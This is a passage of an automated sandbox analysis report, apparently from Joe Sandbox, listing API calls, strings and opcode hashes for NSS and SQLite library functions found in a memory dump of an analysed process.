                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C478A00
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: CERT_CopyRDN.NSS3(00000004,00000000,6C477310,?,?,00000004,?), ref: 6C478A1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C478A74
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D2C
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C47C09B,00000000,00000000,00000000,?,6C47C097,00000000,000000B0,?), ref: 6C471D3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C471D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C47C087,00000000,000000B0,?), ref: 6C471D54
                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C47C0AD
                                                                                                                                                                                                                                                      • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C47C0C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C482DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C47C0D2,6C47C0CE,00000000,-000000D4,?), ref: 6C482DF5
                                                                                                                                                                                                                                                        • Part of subcall function 6C482DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C47C0CE,00000000,-000000D4,?), ref: 6C482E27
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C47C0D6
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47C0E3
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3955726912-0
                                                                                                                                                                                                                                                      • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                      • Instruction ID: d96291ca8283d65bb23e2111cc07ec3aa8bd21dc9474125ec5a8b74af5304087
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321A1B664010567FB20EAA1AC85FFB32BC9B4175DF084138FD04DA746FB22D91982F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD80: free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                                                      • PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                                                      • PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C472EB6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C472EC5
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3332421221-0
                                                                                                                                                                                                                                                      • Opcode ID: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                                                      • Instruction ID: 9169e12b6f706f492796311e7c3b0f29afafca67da032e6de53cfc78c40d0d8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12f2dda7f69dfb3f71a7c5dff336230596f205b07167bc2d84f1381e9531dc1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5521F576A44201E7EF219B25EC09EDA3A749B5235EF050034ED1886B11FB32EA59C7E5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45FD18
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45FD5F
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD89
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C45FD99
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C45FE3C
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45FEE3
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45FEEE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                      • String ID: simple
                                                                                                                                                                                                                                                      • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                      • Opcode ID: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                                                      • Instruction ID: e4fd46e6f641e32371c2988382bac3a9784669e99c3b23c9818e64388577747a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc07923dab7fe427989587cd58d10c2298bf7de69f1e5cc4db8db9d6c7124e8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 029181B0B022058FEB04CF55C880EAAB7B1FF85319F64C568D8199BB52E731E865CB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C465EC9
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C465EED
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C465ED1
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C465EE0
                                                                                                                                                                                                                                                      • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C465E64
                                                                                                                                                                                                                                                      • invalid, xrefs: 6C465EBE
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C465EDB
                                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6C465EC3
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                      • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                      • Opcode ID: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                                                      • Instruction ID: 8708bf872cec13717263f1a55730c1075aae9207930775d73f988f0fb4397601
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15561e8ff6132193e4ff5b415cd5ab73f2d7ace30bc882beca8f7a0f5abccfa0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C81BE30B056129BEB19CF66C848FAA7770BF4130DF288269D8155BF9AD730E842CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DDF9
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE68
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C44DE97
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C44DEB6
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C44DF78
                                                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                                                      • Instruction ID: 10d36a4a40e43641da74d4cb83dc107e442ab20182d041461ac400cb8fe125c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8139ddf86fa2befd63b4d2a6003a810322e4e5504453e437fd92d3e88a15f4a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE8180716047009FE714DF65C880F6A77E1EF85309F24C86DE99A8BB91E731E846CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FCFF3
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C3FB999), ref: 6C3FD02B
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C3FB999), ref: 6C3FD041
                                                                                                                                                                                                                                                      • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3FB999), ref: 6C54972B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                                                      • Instruction ID: 7582f84199e9775e2d9788e13f958186fad4a7cc50a925fb321e5cc4ce629708
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1613771A042108BD310CF29CC41BAABBF5EF95318F1885ADE4489BB42D376E947CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C500113
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500130
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000040), ref: 6C50015D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C5001AF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD056,00000000), ref: 6C500202
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C500224
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500253
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                                                      • String ID: exporter
                                                                                                                                                                                                                                                      • API String ID: 712147604-111224270
                                                                                                                                                                                                                                                      • Opcode ID: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                                                      • Instruction ID: 2b1b9842bc1bc29f616eb6b20addfcdedeec07d5ec8cfaf4a58f863616482d5e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD61F571E007899BEF118FA4CC04BEE77B6BFC4308F144529ED1A96A62EB31A954C791
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C4D536F,00000022,?,?,00000000,?), ref: 6C4D4E70
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C4D4F28
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C4D4F8E
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C4D4FAE
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4FC8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                      • String ID: %s=%c%s%c$%s=%s$oSMl"
                                                                                                                                                                                                                                                      • API String ID: 2709355791-1484050375
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEF6D
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • htonl.WSOCK32(00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFE4
                                                                                                                                                                                                                                                      • htonl.WSOCK32(?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFF1
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6C51A4A1,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF00B
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF027
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                      • String ID: dtls13
                                                                                                                                                                                                                                                      • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C47AFBE
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C599500,6C473F91), ref: 6C47AFD2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C47B007
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C471666,?,6C47B00C,?), ref: 6C4C6AFB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C47B02F
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C47B046
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C47B058
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C47B060
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C473F1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 1076417423-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C4BCD08
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BCE16
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4BD079
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1351604052-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                                                      • Instruction ID: 1449564201a83ca7424df0d8c5bcc67a878503defd01dc3019da259cf4db8f6d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C15CB5A002199BDB20DF24CC84FDAB7B4AB48318F1541A8E948A7741E775EE95CFE0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C4B97C1,?,00000000,00000000,?,?,?,00000000,?,6C497F4A,00000000), ref: 6C4ADC68
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADD36
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE2D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE43
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE76
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF32
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF5F
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF78
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADFAA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1886645929-0
                                                                                                                                                                                                                                                      • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                      • Instruction ID: b5b7dba26cc6bef2a4ae32a9ebba661c24efdb914a3c4a61a195d7ae517043d8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2681B570606A008BFF14CED9C890F5B7692DB7434AF24843ADD5ACAFE9E774D486C642
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C483C76
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C483C94
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C483CB2
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C483CCA
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C483CE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3167935723-0
                                                                                                                                                                                                                                                      • Opcode ID: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                                                      • Instruction ID: 881ce6a4a80df15194f8cb6080a8cce3418c626b5e3f2c343c369ecfaa999f07
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
